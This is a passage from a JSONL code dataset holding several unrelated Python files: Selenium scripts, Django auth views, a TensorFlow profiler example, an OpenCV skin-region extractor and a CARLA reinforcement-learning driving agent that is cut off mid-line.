for m, n in zip(layer_sizes[:-1], layer_sizes[1:])]\n\ndef neural_net_predict(params, inputs):\n \"\"\"Implements a deep neural network for classification. params is a list of (weights, bias) tuples.\n inputs is an (N x D) matrix. returns normalized class log-probabilities.\"\"\"\n for W, b in params:\n outputs = np.dot(inputs, W) + b\n inputs = np.tanh(outputs)\n return outputs\n\nif __name__ == '__main__':\n \n # Model and training parameters\n layer_sizes = [1,10,10,1]\n param_scale, step_size = 1.0, 0.1\n inputs = np.array([[-1.0],[-0.875],[-0.75],[-0.625],[-0.5],[0.5],[0.625],[0.75],[0.875],[1.0]])\n targets = np.array([[ 1.17],[ 0.92],[ 0.64],[ 0.30],[-0.23],[0.86],[1.07],[0.74],[0.34],[-0.10]])\n\n # Randomly initialize the neural net parameters\n init_params = init_random_params(param_scale, layer_sizes)\n\n # Define training objective, equivalent to the log_posterior of the distribution\n def objective(params, iter):\n return np.sum((neural_net_predict(params, inputs) - targets)**2)\n\n # Use autograd to obtain the gradient of the objective function\n objective_grad = grad(objective)\n\n # Set up figure.\n fig1 = plt.figure(figsize=(12, 8), facecolor='white')\n ax = plt.subplot2grid((4,3),(0, 0), colspan = 3)\n ax2 = plt.subplot2grid((4,3),(3, 0))\n ax3 = plt.subplot2grid((4,3),(2, 0))\n ax4 = plt.subplot2grid((4,3),(3, 1))\n ax5 = plt.subplot2grid((4,3),(2, 1))\n ax6 = plt.subplot2grid((4,3),(3, 2))\n ax7 = plt.subplot2grid((4,3),(2, 2))\n plt.ion()\n plt.show(block=False)\n\n def print_function(params, iter, gradient):\n \"\"\" Plot data and functions. \"\"\"\n plot_inputs = np.linspace(-8, 8, num=400)\n outputs = neural_net_predict(params, np.expand_dims(plot_inputs, 1))\n ax.cla()\n ax2.cla()\n ax3.cla()\n ax4.cla()\n ax5.cla()\n ax6.cla()\n ax7.cla()\n ax.plot(inputs, targets, 'bx')\n ax.plot(plot_inputs, outputs)\n ax.set_xlabel(\"Possible Inputs\")\n ax.set_ylabel(\"Neural Network Outputs\")\n ax.set_ylim([-2,2])\n plt.draw()\n ax2.matshow(params[0][0].T, cmap='cool')\n ax2.set_xlabel(\"Hidder Layer 1 (Incoming Weights)\")\n ax3.matshow(np.array([params[0][1]]).T, cmap='cool')\n ax3.set_ylabel(\"Hidder Layer 1 Bias\")\n ax4.matshow(params[1][0].T, cmap='cool')\n ax4.set_xlabel(\"Hidden Layer 2 (Incoming Weights)\")\n ax5.matshow(np.array([params[1][1]]).T, cmap='cool')\n ax5.set_ylabel(\"Hidder Layer 2 Bias\")\n ax6.matshow(params[2][0], cmap='cool')\n ax6.set_xlabel(\"Hidden Layer 2 (Outgoing weights)\")\n ax7.matshow(np.array([params[2][1]]), cmap='cool')\n ax7.set_ylabel(\"Output Bias\")\n #plt.savefig(str(iter) + '.jpg')\n plt.pause(1.0/60.0)\n\n # The optimizers provided can optimize lists, tuples, or dicts of parameters.\n optimized_params = adam(objective_grad, init_params, step_size=step_size,\n num_iters=100, callback=print_function)\n\n","sub_path":"test_code/visual_optimized_neural_net.py","file_name":"visual_optimized_neural_net.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"524772942","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n#driver = webdriver.Chrome(executable_path=\"E:\\chromedriver.exe\")\n\n\n#driver = webdriver.Firefox(executable_path=\"E:\\geckodriver.exe\")\n\ndriver = webdriver.Ie(executable_path=\"E:\\IEDriverServer.exe\")\n\ndriver.get(\"https://zeenyx.com/\")\n\nprint(driver.title) # Title of the page\n\nprint(driver.current_url)\n\n#print(driver.page_source) # gives the HTML source 
code\n\ndriver.close() # Close the browser\n","sub_path":"com/SeleniumBasics/LaunchBrowser.py","file_name":"LaunchBrowser.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"484450461","text":"from django.contrib import auth\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import User\nfrom django.http import Http404\nfrom django.shortcuts import render, redirect, render_to_response, get_object_or_404\nfrom django.template.context_processors import csrf\nfrom .forms import UserCreateForm\nfrom posts.models import Posts\nfrom private_messages.models import Message\nfrom django.db import models\n\n\ndef login(request):\n if request.user.id:\n raise Http404\n args = {}\n args.update(csrf(request))\n args['current_user'] = request.user\n if request.POST:\n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n user = auth.authenticate(username=username, password=password)\n if user is not None:\n auth.login(request, user)\n return redirect('/posts/')\n elif user is None:\n try:\n possible_user = User.objects.get(email=username)\n user = auth.authenticate(username=possible_user.username, password=password)\n auth.login(request, user)\n return redirect('/posts/')\n except User.DoesNotExist:\n return redirect('/posts/')\n else:\n args['login_error'] = \"Пользователь не найден\"\n return render_to_response('login.html', args)\n\n else:\n return render(request, 'login.html', args)\n\n\ndef logout(request):\n auth.logout(request)\n return_path = request.META.get('HTTP_REFERER', '/posts/')\n return redirect(return_path)\n\n\ndef register(request):\n if request.user.id:\n raise Http404\n args = {}\n args.update(csrf(request))\n args['current_user'] = request.user\n args['form'] = UserCreateForm()\n if request.POST:\n newuser_form = UserCreateForm(request.POST)\n if newuser_form.is_valid():\n newuser_form.save()\n newuser = auth.authenticate(username=newuser_form.cleaned_data['username'],\n password=newuser_form.cleaned_data['password1'])\n auth.login(request, newuser)\n return redirect('/posts/')\n else:\n args['form'] = newuser_form\n return render_to_response('register.html', args)\n\n\ndef private_profile(request, username, **kwargs):\n user = get_object_or_404(User, username=username)\n if user != request.user:\n return public_profile(request, username, **kwargs)\n user_posts = Posts.objects.all().filter(user=user, check=True)\n user_posts_at_checkout = Posts.objects.all().filter(user=user, check=False)\n context = {\n 'current_user': request.user,\n 'email': user.email,\n 'first_name': user.first_name,\n 'last_name': user.last_name,\n 'user_posts_at_checkout': user_posts_at_checkout,\n 'user_posts': user_posts,\n }\n if request.user.id:\n context['count_new_messages'] = Message.objects.all().filter(models.Q(topic__recipient=request.user) |\n models.Q(topic__sender=request.user),\n read_at__exact=None).exclude(\n sender=request.user).count()\n return render(request, 'private_profile.html', context)\n\n\ndef public_profile(request, username, **kwargs):\n public_user = get_object_or_404(User, username=username)\n user_posts = Posts.objects.all().filter(user=public_user, check=True)\n context = {\n 'current_user': request.user,\n 'first_name': public_user.first_name,\n 'last_name': public_user.last_name,\n 'last_login': public_user.last_login,\n 'user_posts': user_posts,\n 'public_user': public_user,\n }\n if request.user.id:\n 
context['count_new_messages'] = Message.objects.all().filter(models.Q(topic__recipient=request.user) |\n                                                                      models.Q(topic__sender=request.user),\n                                                                      read_at__exact=None).exclude(\n            sender=request.user).count()\n    return render(request, 'public_profile.html', context)\n\n\ndef dispatch_user(request, username, **kwargs):\n    try:\n        user_for_profile = User.objects.get(username=username)\n        if user_for_profile == request.user:\n            return private_profile(request, username, **kwargs)\n        else:\n            return public_profile(request, username, **kwargs)\n    except:\n        return redirect('/posts/')\n","sub_path":"crud/authapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"168158596","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n#\n#  blast.parse.py\n#\n#  Copyright 2015 The University of Sydney\n#  Author: Jan P Buchmann \n#  Description:\n#\n#  Version: 0\n\nimport sys\nimport argparse\nsys.path.append(\"/home/jan/simbiont/lib/\")\nimport blast.parser as blast\nimport blast.filters as bfilters\n\n\ndef parse_options():\n  argparser = argparse.ArgumentParser(description='Parse BLAST output')\n  argparser.add_argument('-evalue', type=float, default = 10**-6,\n                          help = 'max evalue. Default: 10**-6')\n  argparser.add_argument('-aln_len', type=float, default = 0,\n                          help = 'min alignment length. Default: 0' )\n  argparser.add_argument('-fields', type=str,\n                          default = 'qid,sid,ident,alnlen,evalue',\n                          help = 'show result fields. \\\n                                  Default: qid,sid,ident,alnlen,evalue' )\n  return vars(argparser.parse_args())\n\ndef main():\n  options = parse_options()\n  bp = blast.Parser.json(options)\n  bp.add_filters([bfilters.Hspfilter(options)])\n  bp.show_filters()\n  bp.parse()\n  bp.result.show()\n  #r.show_qry()\n  return 0\n\nif __name__ == '__main__':\n  main()\n","sub_path":"tools/blast/blast.parse.py","file_name":"blast.parse.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"300749630","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom app04 import views\nurlpatterns = patterns('',\n\n    url(r'^ajax/$', views.Ajax),\n    url(r'^add/$', views.Add),\n    url(r'^userlist/$', views.Userlist),\n    url(r'^update/$', views.Update),\n    url(r'^chouti/$', views.ChouTi),\n    url(r'^index/$', views.Index),\n    url(r'^login/$', views.Login),\n    url(r'^register/$', views.Register),\n    url(r'^upload/$', views.UpLoad),\n    url(r'^svnupload/$', views.SvnupLoad),\n    url(r'^tar/$', views.Tar),\n    url(r'^loaddir/$', views.LoadDir),\n    \n)\n","sub_path":"app04/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
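# --- Editor's sketch (not one of the dataset records) -----------------------
# The profile views in crud/authapp/views.py above rebuild the same unread-
# message count inline in each view; a helper like this hypothetical one
# would keep that query in a single place.
from django.db import models
from private_messages.models import Message

def count_new_messages(user):
    """Unread messages in any topic the user takes part in, sent by someone else."""
    return (Message.objects
            .filter(models.Q(topic__recipient=user) | models.Q(topic__sender=user),
                    read_at__exact=None)
            .exclude(sender=user)
            .count())
# -----------------------------------------------------------------------------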
{"seq_id":"147363152","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import mnist\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom tensorflow.python.profiler import model_analyzer\nfrom tensorflow.python.profiler import option_builder\n\n\nclass FLAGS:\n    '''\n    Define the model-related parameters\n    '''\n\n    def __init__(self):\n        self.hidden1_dim = 128  # dimension of hidden layer 1\n        self.hidden2_dim = 32  # dimension of hidden layer 2\n        self.learning_rate = 1e-2  # learning rate\n        self.batch_size = 100\n        self.max_step = 100  # maximum number of training steps\n        self.stats_per_steps = 10  # collect RunMetadata every 10 steps; adjust as needed\n        self.data_set_dir = ''  # replace with your local mnist dataset path, if already downloaded\n\n\nTRAINING_FLAGS = FLAGS()\n\n'''\nDefine the network model and create the session. This block has nothing to do with tfprofiler; paste it as-is, no need to read it.\nThe network model is unchanged: the usual hidden1 + hidden2 + softmax three-layer architecture, where hidden1 and hidden2 are both (Wx+b)->Relu paths.\nIn my environment everything runs on gpu:0 by default.\n'''\ndata_sets = input_data.read_data_sets(\n    train_dir=TRAINING_FLAGS.data_set_dir, fake_data=False)\nimages_placeholder = tf.placeholder(tf.float32, shape=(TRAINING_FLAGS.batch_size,\n                                                       mnist.IMAGE_PIXELS))\nlabels_placeholder = tf.placeholder(\n    tf.int32, shape=(TRAINING_FLAGS.batch_size))\n\nlogits = mnist.inference(images_placeholder,\n                         TRAINING_FLAGS.hidden1_dim,\n                         TRAINING_FLAGS.hidden2_dim)\nloss = mnist.loss(logits, labels_placeholder)\ntrain_op = mnist.training(loss, TRAINING_FLAGS.learning_rate)\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\nmnist_profiler = model_analyzer.Profiler(\n    graph=sess.graph)  # create the tfprofiler instance that records, processes and displays the data\n# set the trace level to FULL_TRACE so we can collect the fullest statistics, including GPU hardware data\nrun_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\nrun_metadata = tf.RunMetadata()  # create RunMetadata, used to aggregate statistics on each session.Run()\n\n'''\nRun session.Run() in a loop, collecting statistics and adding them to the tfprofiler instance\n'''\nfeed_dict = dict()\nfor step in range(TRAINING_FLAGS.max_step):\n    images_feed, labels_feed = data_sets.train.next_batch(\n        TRAINING_FLAGS.batch_size, fake_data=False)\n    feed_dict = {\n        images_placeholder: images_feed,\n        labels_placeholder: labels_feed,\n    }\n    # every TRAINING_FLAGS.stats_per_steps steps, collect the statistics:\n    if step % TRAINING_FLAGS.stats_per_steps == 0:\n        _, loss_value = sess.run(fetches=[\n            train_op, loss], feed_dict=feed_dict, options=run_options, run_metadata=run_metadata)\n\n        # add the statistics collected in this step to the tfprofiler instance\n        mnist_profiler.add_step(step=step, run_meta=run_metadata)\n    else:\n        _, loss_value = sess.run(fetches=[train_op, loss],\n                                 feed_dict=feed_dict)\n\n'''\ngraph view: show each graph node's run time and write it out to a timeline\n'''\n# the collected content is each graph node's run time and memory usage\nprofile_graph_opts_builder = option_builder.ProfileOptionBuilder(\n    option_builder.ProfileOptionBuilder.time_and_memory())\n\n# output as a timeline\nprofile_graph_opts_builder.with_timeline_output(\n    timeline_file='/tmp/mnist_profiler.json')\n# show the statistics for step 70 of sess.Run()\nprofile_graph_opts_builder.with_step(70)\n\n# display as the graph view\nmnist_profiler.profile_graph(profile_graph_opts_builder.build())\n\n'''\nscope view: show how the parameter counts are distributed across the model\n'''\n# the collected content is all trainable Variable ops\nprofile_scope_opt_builder = option_builder.ProfileOptionBuilder(\n    option_builder.ProfileOptionBuilder.trainable_variables_parameter())\n\n# display a nesting depth of 4\nprofile_scope_opt_builder.with_max_depth(4)\n# the displayed field is params, i.e. the parameter counts\nprofile_scope_opt_builder.select(['params'])\n# sort the displayed results by the number of params\nprofile_scope_opt_builder.order_by('params')\n\n# display as the scope view\nmnist_profiler.profile_name_scope(profile_scope_opt_builder.build())\n\n'''\nop view: show the expensive nodes in the model\n'''\nprofile_op_opt_builder = option_builder.ProfileOptionBuilder()\n\n# displayed fields: op execution time and the number of nodes using the op.\n# Note: an op's execution time is the sum of the execution times of all nodes that use it.\nprofile_op_opt_builder.select(['micros', 'occurrence'])\n# sort the displayed results by op execution time\nprofile_op_opt_builder.order_by('micros')\n# filter: only show the top-ranked ops (max depth 4)\nprofile_op_opt_builder.with_max_depth(4)\n\n# display as the op view\nmnist_profiler.profile_operations(profile_op_opt_builder.build())\n\n'''\ncode view: show the execution resources consumed by the Python code\n'''\nprofile_code_opt_builder = option_builder.ProfileOptionBuilder()\n\n# filter: show the mnist.py code.\nprofile_code_opt_builder.with_max_depth(1000)\nprofile_code_opt_builder.with_node_names(show_name_regexes=['mnist.py.*'])\n\n# filter: only show code whose execution time is greater than 10us\nprofile_code_opt_builder.with_min_execution_time(min_micros=10)\n\n# displayed field: execution time, with the results sorted by time\nprofile_code_opt_builder.select(['micros'])\nprofile_code_opt_builder.order_by('micros')\n\n# display as the code view\nmnist_profiler.profile_python(profile_code_opt_builder.build())\n","sub_path":"profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":5502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
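# --- Editor's sketch (not one of the dataset records) -----------------------
# Possible follow-up to profiler.py above: the TF 1.x tfprof API can also emit
# automatic tuning advice from the steps already collected. `ALL_ADVICE` and
# `Profiler.advise` are assumed from that era's tf.profiler; verify they exist
# in your build before relying on this.
from tensorflow.python.profiler import model_analyzer

# `mnist_profiler` is the Profiler instance built in profiler.py above.
mnist_profiler.advise(options=model_analyzer.ALL_ADVICE)
# -----------------------------------------------------------------------------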
显示字段:执行时间,且结果按照时间排序\nprofile_code_opt_builder.select(['micros'])\nprofile_code_opt_builder.order_by('micros')\n\n# 显示视图为code view\nmnist_profiler.profile_python(profile_code_opt_builder.build())\n","sub_path":"profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":5502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"9306204","text":"import imutils\nimport numpy as np\nimport cv2\nimport dlib\n\nimage = cv2.imread(r'D:\\DEAP\\DEAP_dataset\\s01_trial01\\frame0.jpg')\nprint('image shape:',image.shape)\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ndetector = dlib.get_frontal_face_detector() # face detector\npredictor = dlib.shape_predictor('D:\\DEAP\\DEAP_dataset\\shape_predictor_68_face_landmarks.dat') #face detector\nfaces = detector(gray,1)\nh = 100\nfor face in faces:\n landmarks = predictor(gray, face)\n x1 = landmarks.part(20).x\n y1 = landmarks.part(20).y\n x2 = landmarks.part(25).x\n y2 = landmarks.part(25).y\n\n cv2.rectangle(image, (x1, y1-h), (x2, y2), (0, 255, 0), 2)\n\nprint(x1, y1-h, x2, y2)\ncv2.imshow(\"rectangle\", image)\n\nslicedImage = image[y1-h:y2, x1:x2]\n#print(slicedImage)\n#cv2.waitKey(0)\n\ncv2.imshow(\"sliced image\", slicedImage)\n\n\n##### SKIN SELECTION PROCESS -> SKIN MASK INSIDE THE ROI #####\nlower = np.array([0, 48, 80], dtype = \"uint8\") #upper and lower boundaries of skin\nupper = np.array([20, 255, 255], dtype = \"uint8\") #of the HSV pixel intensities to be condidered skin\nslicedImage = imutils.resize(slicedImage, width = 400)\nconverted = cv2.cvtColor(slicedImage, cv2.COLOR_BGR2HSV) #converting RGB to HSV\nskinMask = cv2.inRange(converted, lower, upper) #upper and lower boundaries fo the HSV pixel intensities\n\nkernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11, 11))\nskinMask = cv2.erode(skinMask, kernel, iterations = 2)\nskinMask = cv2.dilate(skinMask, kernel, iterations = 2)\n# blur the mask to help remove noise, then apply the mask to the frame\nskinMask = cv2.GaussianBlur(skinMask, (3, 3), 0)\nskin = cv2.bitwise_and(slicedImage, slicedImage, mask = skinMask)\n# show the skin in the image along with the mask\n# cv2.imshow(\"images\", np.hstack([slicedImage, skin]))\ncv2.imshow(\"final sliced image\", skin)\n\n# print('sliced image:',slicedImage)\n# print('\\nskin selected pixels:',skin)\n# print('\\nAverage of the skin pixels:',np.mean(skin))\n\n### converting to BGR as openCV will read it as RGB\nskin_BGR = cv2.cvtColor(skin, cv2.COLOR_HSV2BGR)\nprint('skin_BGR:',np.mean(skin_BGR[:,:,0]))\n# Rn = skin_BGR[:,:,0]/np.mean(skin_BGR[:,:,0])\n# Gn = skin_BGR[:,:,1]/np.mean(skin_BGR[:,:,1])\n# Bn = skin_BGR[:,:,2]/np.mean(skin_BGR[:,:,2])\n# print('Rn:',Rn)\n# print('Gn:',Gn)\n# print('Bn:',Bn)\n# Xs = (3*Rn) - (2*Gn)\n# Ys = (1.5*Rn) + Gn - (1.5*Bn)\n\n\ncv2.waitKey(0)\n\n\n","sub_path":"code_for_ROI.py","file_name":"code_for_ROI.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"297131098","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\ndriver=webdriver.Firefox(executable_path=\"C:\\Drivers\\geckodriver-v0.27.0-win64\\geckodriver.exe\")\r\n\r\ndriver.get(\"https://phptravels.com/demo/\") #opening the website\r\n\r\nlinks=driver.find_elements(By.TAG_NAME, \"a\") #capture all the links and storing them in a variable\r\n\r\nprint(\"Number of links present in the webpage are: 
\",len(links)) #print how many links present in a page\r\n\r\n#extracting each and every link from links list and printing them\r\n#for loop will read each link and print the same out\r\n\r\nfor link in links:\r\n print(link.text)\r\n\r\n#Clicking on the link, either by using the link_text method or partial link_text method\r\n\r\n#driver.find_element(By.LINK_TEXT,\"Pricing\").click()\r\ndriver.find_element_by_partial_link_text(\"Pri\").click()\r\n\r\ndriver.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"111113711","text":"import glob\r\nimport os\r\nimport sys\r\nimport cv2\r\nimport numpy as np\r\nimport torch\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport math\r\nfrom tensorboardX import SummaryWriter\r\n\r\nfrom librerys.cnn import CNN\r\nfrom librerys.decay_schedule import LinearDecaySchedule\r\nfrom librerys.experience_memory import ExperienceMemory, Experience\r\n\r\ntry:\r\n sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (\r\n sys.version_info.major,\r\n sys.version_info.minor,\r\n 'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])\r\nexcept IndexError:\r\n pass\r\nimport carla\r\n#Contador global de ejecuciones\r\nglobal_step_num = 0\r\n\r\n# Habilitar entrenamiento por gráfica o CPU\r\nuse_cuda = True\r\ndevice = torch.device(\"cuda:\"+str(args.gpu_id) if torch.cuda.is_available() and use_cuda else \"cpu\")\r\n\r\n# Habilitar la semilla aleatoria para poder reproducir el experimento a posteriori\r\nseed = 2020\r\ntorch.manual_seed(seed)\r\nnp.random.seed(seed)\r\nif torch.cuda.is_available() and use_cuda:\r\n torch.cuda.manual_seed_all(seed)\r\n\r\n\r\nwriter = SummaryWriter()\r\n\r\nSTEPS_PER_EPISODE = 300\r\nSHOW_PREVIEW = False\r\nSECONDS_PER_EPISODE=20\r\n#MAX_NUM_EPISODES = 100\r\nMAX_NUM_EPISODES = 200\r\nclip_reward=True\r\nuse_target_network=True\r\nload_trained_model=True\r\nlista_ecu=[]\r\nlista_error=[]\r\nclass CarEnv:\r\n SHOW_CAM = SHOW_PREVIEW\r\n STEER_AMT = 1.0\r\n\r\n actor_list = []\r\n\r\n front_camera = None\r\n collision_hist = []\r\n\r\n def __init__(self):\r\n im_width = 84\r\n im_height = 84\r\n self.im_width = im_width\r\n self.im_height = im_height\r\n self.client = carla.Client('localhost', 2000)\r\n self.client.set_timeout(2.0) \r\n self.world = self.client.get_world()\r\n blueprint_library = self.world.get_blueprint_library()\r\n self.model_3 = blueprint_library.filter('model3')[0]\r\n \r\n def reset(self):\r\n self.collision_hist = []\r\n self.actor_list = []\r\n\r\n self.transform = random.choice(self.world.get_map().get_spawn_points())\r\n self.vehicle = self.world.spawn_actor(self.model_3, self.transform)\r\n self.actor_list.append(self.vehicle)\r\n\r\n self.rgb_cam = self.world.get_blueprint_library().find('sensor.camera.rgb')\r\n\r\n self.rgb_cam.set_attribute('image_size_x', f'{self.im_width}')\r\n self.rgb_cam.set_attribute('image_size_y', f'{self.im_height}')\r\n self.rgb_cam.set_attribute('fov', '110')\r\n\r\n\r\n transform = carla.Transform(carla.Location(x=5, z=2))\r\n\r\n self.sensor = self.world.spawn_actor(self.rgb_cam, transform, attach_to=self.vehicle)\r\n\r\n self.actor_list.append(self.sensor)\r\n self.sensor.listen(lambda data: self.process_img(data))\r\n\r\n colsensor = self.world.get_blueprint_library().find('sensor.other.collision')\r\n self.colsensor = self.world.spawn_actor(colsensor, 
transform, attach_to=self.vehicle)\r\n self.actor_list.append(self.colsensor)\r\n self.colsensor.listen(lambda event: self.collision_data(event))\r\n\r\n while self.front_camera is None:\r\n time.sleep(0.01)\r\n\r\n self.episode_start = time.time()\r\n self.vehicle.apply_control(carla.VehicleControl(throttle=0.0, brake=0.0)) \r\n\r\n return self.front_camera \r\n \r\n def collision_data(self, event):\r\n self.collision_hist.append(event)\r\n \r\n\r\n def process_img(self, image):\r\n i2 = np.array(image.raw_data)\r\n i2 = i2.reshape((self.im_height, self.im_width, 4))\r\n i3 = i2[:, :, :3]\r\n if self.SHOW_CAM:\r\n cv2.imshow(\"\", i3)\r\n cv2.waitKey(1)\r\n i3 = i3.mean(2)\r\n i3 = i3.astype(np.float32)\r\n i3 *= 1.0/255.0\r\n i3 = np.reshape(i3, [1,84,84])\r\n i3 = i3[np.newaxis, ...]\r\n self.front_camera = i3\r\n def obs_shape(self):\r\n obs = self.front_camera.shape\r\n return obs\r\n def action_space(self):\r\n action_space_name = [\"throttle center\",\"throttle left\",\"throttle right\",\"brake\"]\r\n return action_space_name\r\n \r\n def step(self, action):\r\n if action == 3:\r\n self.vehicle.apply_control(carla.VehicleControl(brake=1.0))\r\n fre = 0\r\n\r\n if action == 2:\r\n self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=0, brake=0.0))\r\n fre = 1\r\n \r\n if action == 1:\r\n self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=-1*self.STEER_AMT, brake=0.0))\r\n fre = 0\r\n \r\n if action == 0:\r\n self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=1*self.STEER_AMT, brake=0.0))\r\n fre = 0\r\n \r\n v = self.vehicle.get_velocity()\r\n kmh = int(3.6 * math.sqrt(v.x**2 + v.y**2 + v.z**2))\r\n if len(self.collision_hist) != 0:\r\n done = True\r\n reward = -2000\r\n elif kmh < 20:\r\n done = False\r\n reward = -10\r\n if kmh > 50:\r\n kmh = 50\r\n elif fre == 1:\r\n done = False\r\n reward = 500\r\n else:\r\n done = False\r\n reward = 500\r\n if self.episode_start + SECONDS_PER_EPISODE < time.time():\r\n reward = 2000\r\n done = True\r\n\r\n return self.front_camera, reward, done, None\r\n\r\nclass DQNAgent(object):\r\n def __init__(self, obs_shape, action_shape):\r\n self.gamma=0.75\r\n self.learning_rate=0.9\r\n self.best_mean_reward = -float(\"inf\")\r\n self.best_reward = -float(\"inf\")\r\n self.training_steps_completed = 0\r\n self.action_shape=action_shape\r\n\r\n self.DQN=CNN\r\n\r\n self.Q = self.DQN(obs_shape, action_shape, device).to(device)\r\n self.Q_optimizer = torch.optim.Adam(self.Q.parameters(), lr = self.learning_rate)\r\n\r\n if use_target_network:\r\n self.Q_target = self.DQN(obs_shape, action_shape, device).to(device)\r\n\r\n self.policy = self.epsilon_greedy_Q\r\n self.epsilon_max = 1.0\r\n self.epsilon_min = 0.005\r\n self.epsilon_decay = LinearDecaySchedule(initial_value = self.epsilon_max,\r\n final_value = self.epsilon_min, \r\n max_steps = 0.5 * MAX_NUM_EPISODES * STEPS_PER_EPISODE)\r\n self.step_num = 0\r\n\r\n self.memory = ExperienceMemory(capacity = int(1000000))\r\n\r\n def get_action(self, obs):\r\n return self.policy(obs)\r\n\r\n def epsilon_greedy_Q(self, obs):\r\n self.step_num += 1\r\n if random.random() < self.epsilon_decay(self.step_num):\r\n print(self.epsilon_decay(self.step_num))\r\n action = random.choice([a for a in range(self.action_shape)])\r\n else:\r\n action = np.argmax(self.Q(obs).data.to(torch.device('cpu')).numpy())\r\n print(\"se activo la red neuronal\")\r\n return action\r\n\r\n def learn(self, obs, action, reward, next_obs, done):\r\n if done:\r\n td_target = reward + 0.0\r\n 
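# non-terminal step: bootstrap the TD target from the online network's estimate of the next state's value\r\n        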
else:\r\n            td_target = reward + self.gamma * torch.max(self.Q(next_obs))\r\n\r\n        a=self.Q(obs)\r\n        td_error = a[:,action]-td_target\r\n        self.Q_optimizer.zero_grad()\r\n        td_error.backward()\r\n        writer.add_scalar(\"DQL/TD_error\", td_error.mean(), self.step_num)\r\n        self.Q_optimizer.step()\r\n\r\n    def replay_experience(self, batch_size = None):\r\n        batch_size = batch_size if batch_size is not None else 32\r\n        experience_batch = self.memory.sample(batch_size)\r\n        self.learn_from_batch_experience(experience_batch)\r\n        self.training_steps_completed += 1\r\n\r\n    def learn_from_batch_experience(self, experiences):\r\n        batch_xp = Experience(*zip(*experiences))\r\n        obs_batch = np.array(batch_xp.obs)/255.0\r\n        action_batch = np.array(batch_xp.action)\r\n        reward_batch = np.array(batch_xp.reward)\r\n        \r\n\r\n        if clip_reward == True:\r\n            reward_batch = np.sign(reward_batch)\r\n        next_obs_batch = np.array(batch_xp.next_obs)/255.0\r\n        done_batch = np.array(batch_xp.done)\r\n\r\n        for i in range(31):\r\n            if use_target_network == True:\r\n                if self.step_num % 2000 == 0:\r\n                    self.Q_target.load_state_dict(self.Q.state_dict())\r\n                td_target = reward_batch + ~done_batch * \\\r\n                    np.tile(self.gamma, len(next_obs_batch)) #* \\\r\n                td_target = td_target[i]*self.Q_target(next_obs_batch[i]).max(1)[0].data.cpu().numpy()\r\n                lista_ecu.append(td_target)\r\n\r\n            else:\r\n                td_target = reward_batch + ~done_batch * \\\r\n                    np.tile(self.gamma, len(next_obs_batch)) #* \\\r\n                td_target = td_target[i]*self.Q(next_obs_batch[i]).max(1)[0].data.cpu().numpy()\r\n                lista_ecu.append(td_target)\r\n        \r\n        td_target = torch.Tensor(lista_ecu)\r\n        td_target = td_target.to(device)\r\n        action_idx = torch.from_numpy(action_batch).to(device)\r\n        \r\n        for j in range(31):\r\n            self.Q_optimizer.zero_grad()\r\n            td_error = self.Q(obs_batch[j]).gather(1, action_idx[j].view(-1,1))-(td_target[j].float().unsqueeze(1))\r\n            td_error.mean().backward()\r\n            self.Q_optimizer.step()\r\n\r\n    def save(self, env_name):\r\n        file_name = \"trained_models/\"+\"DQL_\"+env_name+\".pt\"\r\n        agent_state = {\"Q\": self.Q.state_dict(),\r\n                       \"best_mean_reward\": self.best_mean_reward,\r\n                       \"best_reward\": self.best_reward}\r\n        torch.save(agent_state, file_name)\r\n        print(\"Estado del agente guardado en : \", file_name)\r\n        \r\n        \r\n    def load(self, env_name):\r\n        file_name = \"trained_models/\"+\"DQL_\"+env_name+\".pt\"\r\n        agent_state = torch.load(file_name, map_location = lambda storage, loc: storage)\r\n        self.Q.load_state_dict(agent_state[\"Q\"])\r\n        self.Q.to(device)\r\n        self.best_mean_reward = agent_state[\"best_mean_reward\"]\r\n        self.best_reward = agent_state[\"best_reward\"]\r\n        print(\"Cargado del modelo Q desde\", file_name,\r\n              \"que hasta el momento tiene una mejor recompensa media de: \",self.best_mean_reward,\r\n              \" y una recompensa máxima de: \", self.best_reward)\r\n        \r\nif __name__=='__main__':\r\n    env_name = 